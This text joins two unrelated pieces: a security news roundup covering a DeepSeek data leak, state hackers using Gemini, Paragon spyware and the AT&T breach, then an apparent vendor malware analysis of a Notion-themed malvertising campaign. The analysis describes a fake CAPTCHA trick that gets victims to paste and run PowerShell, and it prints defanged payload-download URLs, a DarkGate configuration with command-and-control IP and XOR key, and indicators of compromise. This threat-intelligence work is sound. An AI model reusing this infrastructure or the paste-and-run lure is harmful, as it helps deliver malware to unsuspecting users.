Meanwhile, security researchers at Wiz discovered that DeepSeek left a critical database exposed online, leaking over 1 million records, including user prompts, system logs, and API authentication tokens. As the platform promotes its cheaper R1 reasoning model, security researchers tested 50 well-known jailbreaks against DeepSeek’s chatbot and found lagging safety protections as compared to Western competitors.

Brandon Russell, the 29-year-old cofounder of the Atomwaffen Division, a neo-Nazi guerrilla organization, is on trial this week over an alleged plot to knock out Baltimore’s power grid and trigger a race war. The trial provides a look into federal law enforcement’s investigation into a disturbing propaganda network aiming to inspire mass casualty events in the US and beyond.

An informal group of West African fraudsters calling themselves the Yahoo Boys are using AI-generated news anchors to extort victims, producing fabricated news reports falsely accusing them of crimes. A WIRED review of Telegram posts reveals that these scammers create highly convincing fake news broadcasts to pressure victims into paying ransoms by threatening public humiliation.

That’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click on the headlines to read the full stories. And stay safe out there.

According to a report by The Wall Street Journal, hacking groups with known ties to China, Iran, Russia, and North Korea are leveraging AI chatbots like Google Gemini to assist with tasks such as writing malicious code and researching potential attack targets.

While Western officials and security experts have long warned about AI's potential for malicious use, the Journal, citing a Wednesday report from Google, noted that the dozens of hacking groups across more than 20 countries are primarily using the platform as a research and productivity tool—focusing on efficiency rather than developing sophisticated and novel hacking techniques.

Iranian groups, for instance, used the chatbot to generate phishing content in English, Hebrew, and Farsi. China-linked groups used Gemini for tactical research into technical concepts like data exfiltration and privilege escalation. In North Korea, hackers used it to draft cover letters for remote technology jobs, reportedly in support of the regime’s effort to place spies in tech roles to fund its nuclear program.

This is not the first time foreign hacking groups have been found using chatbots. Last year, OpenAI disclosed that five such groups had used ChatGPT in similar ways.

**WhatsApp Reveals Targets of Paragon Spyware**

On Friday, WhatsApp disclosed that nearly 100 journalists and civil society members were targeted by spyware developed by the Israeli firm Paragon Solutions. The Meta-owned company alerted affected individuals, stating with “high confidence” that at least 90 users had been targeted and “possibly compromised,” according to a statement to The Guardian. WhatsApp did not reveal where the victims were located, including whether any were in the United States.

The attack appears to have used a “zero-click” exploit, meaning victims were infected without needing to open a malicious link or attachment. Once a phone is compromised, the spyware—known as Graphite—grants the operator full access, including the ability to read end-to-end encrypted messages sent via apps like WhatsApp and Signal.

While it remains unclear who orchestrated the attack, Paragon’s spyware is marketed to government clients, and is similar to that of NSO Group, the controversial Israeli firm behind the Pegasus spyware.

In October, WIRED reported that US Immigration and Customs Enforcement had signed a $2 million contract with the Israeli firm. After our reporting, ICE later issued a stop-work order to review whether the deal complied with a Biden administration executive order restricting the use of spyware to limited circumstances. That 2023 executive order remains in effect, despite the Trump administration rescinding dozens of Biden-era policies in Trump’s first two weeks in office.

**Hackers Used AT&T Breach Data to Hunt for Info on US Politicians**

Hackers behind last year’s massive AT&T data breach sifted through stolen records in search of information linked to high-profile figures, including members of the Trump family, Vice President Kamala Harris, and Jeanette Rubio, the wife of Senator Marco Rubio, according to 404 Media.

In April 2024, hackers breached AT&T’s instance of Snowflake, a widely used data warehousing tool, gaining access to 50 billion records of calls and text messages. According to 404Media, the hackers then enriched the dataset using publicly available tools, appending names to phone numbers to make the records more identifiable as part of a plant to launch a lookup tool that would allow anyone to search the stolen records—for a fee.

Two individuals have been identified as allegedly responsible for the breach: Connor Riley Moucka, a Canadian national who was arrested in November; and John Binns, an American hacker residing in Turkey who was previously arrested for a 2021 breach of T-Mobile. They are linked to a loosely connected online network of criminals called the Com.

**Mystery Drones Over New Jersey Were ‘Authorized,’ White House Says**

At the first press briefing of Donald Trump’s second administration, White House press secretary Karoline Leavitt addressed the surge of unexplained drones spotted over New Jersey and other parts of the East Coast late last year. Leavitt said President Trump personally briefed her on the issue in the Oval Office, stating, “After research and study, the drones that were flying over New Jersey in large numbers were authorized to be flown by the FAA for research and various other reasons.”

Leavitt downplayed concerns about a foreign threat, adding, “In time, it got worse due to curiosity. This was not the enemy.”

The wave of sightings began just before Thanksgiving, with witnesses reporting unidentified drones flying in formation night after night. Some were spotted hovering over military installations and water reservoirs. Within weeks, the FBI received more than 5,000 reports of drone activity—only about 100 cases warranted further investigation.

Despite mounting public pressure, officials offered few definitive answers. By mid-December, a coalition of federal agencies—including the Department of Homeland Security, the FBI, and the Department of Defense—issued a joint statement concluding that the reported aerial objects were a mix of lawful drones, airplanes, helicopters, and stars.

Foreign Hackers Are Using Google’s Gemini in Attacks on the US

Social engineering methods are being put to the test to distribute malware.

During the past several months there have been numerous malware campaigns that use a technique something referred to as “ClickFix”. It often consists of a fake CAPTCHA or similar traffic validation page where visitors are instructed to paste and execute code in order to proceed.

We have started to see ClickFix attacks more and more via malicious Google ads as well. This is in contrast to typical phishing pages where victims download a so-called installer that contains malware.

In a recent malvertising campaign targeting the Notion brand, we observed these two techniques used at play. It’s quite possible the threat actors were collecting metrics to determine which one of the two gave them the most conversions via malware installs.

This blog post details this campaign that ultimately delivered the DarkGate malware loader.

**Overview**

**Web traffic view**

**Delivery #1: PowerShell code via “ClickFix”****Malicious ad and social engineering**

Threat actors created a Google ad for the popular utility application Notion. The first time we clicked on the ad, we were redirected to a site showing a “Verify you are human” page, also known as Cloudflare Turnstile. Except this was not the real Cloudflare, and merely a social engineering trick.

The HTML source code was obfuscated to only show gibberish interlaced with Russian comments, which we later determined was Rot13, a letter substitution cipher. This was likely used to hide the offending code from prying eyes and network rules:

After checking the box to verify we are human, we see new instructions, “Verification steps”, that involve pressing a number of key combinations. _Windows + R_ launches the run dialog while _Ctrl + V_ will paste whatever is in the clipboard. Supposedly this code is part of the verification process, but instead when pressing Enter, the victim will run a malicious command:

**PowerShell and payload**

The code copied into the clipboard is actually a command line that runs PowerShell:

The Base64 encoded string retrieves the following code from _hxxps\[:\]//s2notion\[.\]com/in.php?action=1_:

This downloads a binary from _hxxps\[:\]//s2notion\[.\]com/in.php?action=2_. and runs its. That file contains an AutoIt script that launches from:

"c:\\temp\\test\\Autoit3.exe" c:\\temp\\test\\script.a3x

The following DarkGate configuration was extracted from it:

{'DarkGate': {'C2': \[\['155.138.149.77'\]\], 'unknown\_8': \['No'\], 'name': \['DarkGate'\], 'unknown\_12': \['R0ijS0qCVITtS0e6xeZ'\], 'unknown\_13': \['6'\], 'unknown\_14': \['Yes'\], 'port': \['80'\], 'startup\_persistence': \['Yes'\], 'unknown\_32': \['No'\], 'check\_display': \['Yes'\], 'check\_disk': \['No'\], 'min\_disk\_size': \['100'\], 'check\_ram': \['No'\], 'min\_ram\_size': \['4096'\], 'check\_xeon': \['No'\], 'unknown\_21': \['No'\], 'unknown\_23': \['Yes'\], 'unknown\_31': \['No'\], 'unknown\_24': \['N-traff'\], 'campaign\_id': \['user1'\], 'unknown\_26': \['No'\], 'xor\_key': \['sDcGdADE'\], 'unknown\_28': \['No'\], 'unknown\_29': \['2'\], 'unknown\_35': \['No'\], 'tabla': \['a2THNyA\]7u6Kiv$8k.F\*ZrO"do1wL9P0 3}eCGDY{XVzctg,&EhJfsx=n)mpQUqljIW5SRMb4B(\['\]}}

**Delivery #2: signed executable****Malicious ad and decoy site**

We saw this scenario after revisiting the malicious ad for a second time. Notice how the URL path is now including “/download/”.

This is the more traditional approach to malvertising for software downloads that we’ve seen for a while now. Victims download an executable after being tricked with a lookalike site. The file was found hosted on Github under the user profile _herawtisabela1992_:

This fake Notion installer was digitally signed (now revoked) by KDL CENTRAL LIMITED. Similar to the other binary mentioned in the first delivery technique, this one also extracts an AutoIt payload, with the same DarkGate configuration.

It’s interesting to note that the same GitHub user account previously distributed a backdoor called Warmcookie (aka Badspace) from:

raw\[.\]\]githubusercontent\[.\]com/herawtisabela1992/check/refs/heads/main/920836164\_x64.exe

**Conclusion**

We were not surprised to see the ClickFix social engineering attack here, but what made this campaign interesting what that it alternated between ClickFix and the typical file download.

It’s quite likely someone is tracking stats and comparing numbers to see which of the two delivery methods yields the most successful installs. If we had to put our money on it, we would bet that ClickFix is ahead. The file download technique remains effective, especially if the payload is digitally signed, but it could be relegated to second place in the near future.

Malwarebytes detects both payloads as Trojan.Dropper and Backdoor.DarkGate.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**Indicators of Compromise**

Malvertising infrastructure

notionbox\[.\]org  
s2notion\[.\]com

Payloads

6b6676267c70fbeb3257f0bb9bce1587f0bdec621238eb32dd9f84b2bcd7e3ea  
4fe8bbc88d7a8cc0eec24bd74951f1f00b5127e3899ae53de8dabd6ff417e6db

Tag

#git